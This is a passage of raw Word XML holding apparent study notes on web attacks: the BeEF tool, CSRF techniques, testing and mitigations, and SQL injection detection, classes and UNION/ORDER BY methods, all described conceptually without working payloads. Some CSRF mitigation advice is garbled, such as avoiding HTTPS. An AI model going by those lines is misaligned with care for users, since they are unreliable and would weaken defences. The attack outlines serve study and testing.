        <w:t>Browser Exploitation Framework project (BeEF) is a pen test tool which focus on the web browser, and using it, can launch hacking attacks on workstation within protected perimeter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166E604F" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599"/>
    <w:p w14:paraId="7E519908" w14:textId="6FB22D5D" w:rsidR="00F10E40" w:rsidRDefault="00F10E40" w:rsidP="00543599">
      <w:r>
        <w:t>Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D56D43D" w14:textId="74AB8D50" w:rsidR="00543599" w:rsidRDefault="00A52871" w:rsidP="00F10E40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Idea is to trick the user into submitting a create/delete/update request on an existing browser session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D896032" w14:textId="5B87501C" w:rsidR="00A52871" w:rsidRDefault="00A52871" w:rsidP="00F10E40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Relies on the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5139DE" w14:textId="775429CD" w:rsidR="00A52871" w:rsidRDefault="00A52871" w:rsidP="00A52871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web browser hand session data such as the cookie and HTTP authentication info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D325877" w14:textId="77777777" w:rsidR="00A52871" w:rsidRDefault="00A52871" w:rsidP="00A52871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Valid web app URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55948BD0" w14:textId="44787BCE" w:rsidR="00A52871" w:rsidRPr="00A52871" w:rsidRDefault="00A52871" w:rsidP="00A52871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52871">
        <w:lastRenderedPageBreak/>
        <w:t>Web page functions which rely on Cookies and HTTP authentication info known by the web browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F477D8C" w14:textId="7AC38678" w:rsidR="00A52871" w:rsidRDefault="00A52871" w:rsidP="00A52871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HTML elements which call back to server resources such as an img tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E3DD3" w14:textId="4DF26CFC" w:rsidR="00A52871" w:rsidRDefault="00A52871" w:rsidP="00A52871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Two types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436BFF48" w14:textId="65774FD1" w:rsidR="00A52871" w:rsidRDefault="00A52871" w:rsidP="00A52871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OSRF (On site Request Forgery): Currently rendered in victims web page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B04F0A5" w14:textId="2DBACD65" w:rsidR="00A52871" w:rsidRDefault="00A52871" w:rsidP="00A52871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CRSF (Cross site request forgery): </w:t>
      </w:r>
      <w:r w:rsidR="00754BFA">
        <w:t xml:space="preserve">Browsing one website but are logged into one other website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC94F5" w14:textId="7A3294F3" w:rsidR="00A52871" w:rsidRDefault="00754BFA" w:rsidP="00A52871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>User -Browser -Server Interaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2442E5" w14:textId="6AC54F73" w:rsidR="00754BFA" w:rsidRDefault="00754BFA" w:rsidP="00754BFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>User accesses page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E28FEAA" w14:textId="0CC0E1BD" w:rsidR="00754BFA" w:rsidRDefault="00754BFA" w:rsidP="00754BFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>They receive a home page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590060A9" w14:textId="05AF49A4" w:rsidR="00754BFA" w:rsidRDefault="00754BFA" w:rsidP="00754BFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>They click login and the browser then responds with the login form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015AA5E6" w14:textId="77777777" w:rsidR="00754BFA" w:rsidRDefault="00754BFA" w:rsidP="00754BFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The user then types in Username and Password then clicks login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598775B7" w14:textId="5FF2C02F" w:rsidR="00754BFA" w:rsidRDefault="00754BFA" w:rsidP="00754BFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Browser generates a post request sends it with username and password to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115F2F5" w14:textId="25B889B9" w:rsidR="00754BFA" w:rsidRDefault="00754BFA" w:rsidP="00754BFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Server checks to see if the 2 match and then generates a page and session cookie and then sends them plus an HTML with a form in it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C277AE" w14:textId="0E799691" w:rsidR="00754BFA" w:rsidRDefault="00754BFA" w:rsidP="00754BFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If the user wishes to update data, the user fills out the form and sends a session cookie alongside it then the server performs the action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6886E4" w14:textId="69F72EC7" w:rsidR="006A0C80" w:rsidRDefault="006A0C80" w:rsidP="006A0C80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>One way to do this is to load a 1x1 pixel image whose source is another website that causes the other site to do something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55901111" w14:textId="674C45E6" w:rsidR="006A0C80" w:rsidRDefault="006A0C80" w:rsidP="006A0C80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A forged request will always be sent as part of the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A52DE40" w14:textId="30E5380B" w:rsidR="006A0C80" w:rsidRDefault="006A0C80" w:rsidP="006A0C80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We can always add parameters to a forge request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D4E30" w14:textId="78B87E39" w:rsidR="006A0C80" w:rsidRDefault="006A0C80" w:rsidP="006A0C80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If we know a form is vulnerable, we can create a similar looking post with hidden input types(not rendered/not visible) and same action on a different webpage. As it would be rendered in the background and use a JavaScript to submit the form automatically. Can embed it anywhere  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240F5004" w14:textId="2923343E" w:rsidR="006A0C80" w:rsidRDefault="006A0C80" w:rsidP="006A0C80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To Test for CSRF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501899E1" w14:textId="4893D304" w:rsidR="006A0C80" w:rsidRDefault="006A0C80" w:rsidP="006A0C80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Black Box</w:t>
      </w:r>
      <w:r w:rsidR="0054260F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C62A434" w14:textId="399E07E6" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Know URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2348D817" w14:textId="09F3B49D" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pick a URL and create an HTML which contains an http request which references the URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6021D943" w14:textId="03D74A79" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Victim is logged in and then find a method which makes the user click/follow the link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36269D26" w14:textId="25B7ADBA" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>See result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E760184" w14:textId="3635EF71" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Grey Box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF7C3E" w14:textId="01C6523F" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Review the web app to see if session management is vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3850FC60" w14:textId="5DE971FD" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>See if session management relies only on client side values like cookies/HTTP authentications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3CE526" w14:textId="00209A64" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To mitigate CSRF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231A3B05" w14:textId="1502C262" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Generate per-session and per-session nonces and use the same origin policy HTTP header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5053F" w14:textId="589B8E24" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Avoid using URL rewriting, HTTPS, multistep transactions and using a secret cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC0B8FC" w14:textId="000A2B2F" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do not only accept post requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038C9B12" w14:textId="1FA86AFA" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Log out of all application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FEE7E" w14:textId="2D5E7FD1" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use a VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFDEE0" w14:textId="1FD41FD7" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>For sensitive info, use different browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625DB26A" w14:textId="1C133BCE" w:rsidR="0054260F" w:rsidRDefault="0054260F" w:rsidP="0054260F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Change passwords often</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF646E" w14:textId="624E27F3" w:rsidR="00E74A09" w:rsidRDefault="00E74A09" w:rsidP="00E74A09">
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="003F62B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6518EDF3" w14:textId="354738B2" w:rsidR="00E74A09" w:rsidRDefault="003F62B3" w:rsidP="00E74A09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Can lead to following :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081B871B" w14:textId="3FF09461" w:rsidR="003F62B3" w:rsidRDefault="003F62B3" w:rsidP="003F62B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Circumventing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> of access controls </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C9085A" w14:textId="03FF6EC9" w:rsidR="003F62B3" w:rsidRDefault="003F62B3" w:rsidP="003F62B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Read sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201BD09C" w14:textId="7084C4D1" w:rsidR="003F62B3" w:rsidRDefault="003F62B3" w:rsidP="003F62B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>odification of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23839D31" w14:textId="6D14031F" w:rsidR="003F62B3" w:rsidRDefault="003F62B3" w:rsidP="003F62B3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Execute admin </w:t>
      </w:r>
      <w:r>
        <w:t>operations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> on DB or operating system </w:t>
      </w:r>
      <w:r>
        <w:t>commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE83C7" w14:textId="77F6D1B8" w:rsidR="003F62B3" w:rsidRDefault="003F62B3" w:rsidP="003F62B3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Read file contents of DBMS file system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47871FF3" w14:textId="28194C0C" w:rsidR="003F62B3" w:rsidRDefault="0046513D" w:rsidP="003F62B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>How to detect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AD3413" w14:textId="26424FE8" w:rsidR="0046513D" w:rsidRDefault="0046513D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Make a list of all input fields including hidden ones and </w:t>
      </w:r>
      <w:r>
        <w:t>consider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP headers and cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7846D132" w14:textId="1C4614FD" w:rsidR="0046513D" w:rsidRDefault="0046513D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t>Find out where the application interacts with the DB such as forms, search and other e-commerce functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D680FAF" w14:textId="057AB7D6" w:rsidR="0046513D" w:rsidRDefault="0046513D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t>Use a single quote or a semi-colon (</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/;). Both need to be dealt with as a single quote terminates a string while the semi colon ends an SQL statement . Both can cause errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E2B54D" w14:textId="06BD6F8C" w:rsidR="0046513D" w:rsidRDefault="006E6B58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t>Figure out what</w:t>
      </w:r>
      <w:r w:rsidR="0046513D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> DB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MS is being used</w:t>
      </w:r>
      <w:r w:rsidR="0046513D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> by observing error returned by the DB or in the case we have a custom/no error message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, look at the message format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A45656" w14:textId="436C7AFC" w:rsidR="0046513D" w:rsidRDefault="0046513D" w:rsidP="0046513D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5D7FDF" w14:textId="0AFDB881" w:rsidR="0046513D" w:rsidRDefault="0046513D" w:rsidP="0046513D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0046513D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429BDD31" wp14:editId="066A6A76">
            <wp:extent cx="5943600" cy="1280160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="247575829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75829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38E" w14:textId="6626100D" w:rsidR="006E6B58" w:rsidRDefault="006E6B58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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Idea here is create a connection, then create a statement in the connection. Afterwards, you create your malicious SQL query </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute it via the statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D0EB0" w14:textId="207CACDF" w:rsidR="0046513D" w:rsidRDefault="0046513D" w:rsidP="0046513D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Once can exploit </w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> operators here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367B04D4" w14:textId="63AE41A8" w:rsidR="0046513D" w:rsidRDefault="0046513D" w:rsidP="0046513D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3 types of SQL classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7518C" w14:textId="7871D0F8" w:rsidR="0046513D" w:rsidRDefault="0046513D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Inband: In which data is </w:t>
      </w:r>
      <w:r>
        <w:t>extracted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the same channel where SQL code is injected. Most common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F41BC3" w14:textId="3F943ADB" w:rsidR="0046513D" w:rsidRDefault="0046513D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t>Out-of-band: Retrieved from different channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6065D974" w14:textId="1E71627D" w:rsidR="0046513D" w:rsidRDefault="0046513D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Blind: No transfer of data but tester is able to reconstruct info via requests and </w:t>
      </w:r>
      <w:r>
        <w:t>observing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> resulting behaviour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC99DE" w14:textId="39D947C8" w:rsidR="0046513D" w:rsidRDefault="0046513D" w:rsidP="0046513D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Techniques: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5069E7E6" w14:textId="77777777" w:rsidR="0046513D" w:rsidRDefault="0046513D" w:rsidP="0046513D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ion: </w:t>
      </w:r>
      <w:r w:rsidRPr="0046513D">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>can be used when the SQL injection flaw happens in a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0046513D">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>SELECT statement, making it possible to combine two</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0046513D">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>queries into a single result or result s</w:t>
      </w:r>
      <w:r w:rsidRPr="0046513D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>et</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30004C45" w14:textId="61DDC16E" w:rsidR="0046513D" w:rsidRDefault="0046513D" w:rsidP="0046513D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>Keyword ALL is important to get around DISTINCT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0C8B7D" w14:textId="49B63F4B" w:rsidR="0046513D" w:rsidRDefault="0046513D" w:rsidP="0046513D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>We can use ORDER BY to determine number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429BA02E" w14:textId="25DF0097" w:rsidR="000C14C1" w:rsidRDefault="000C14C1" w:rsidP="0046513D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
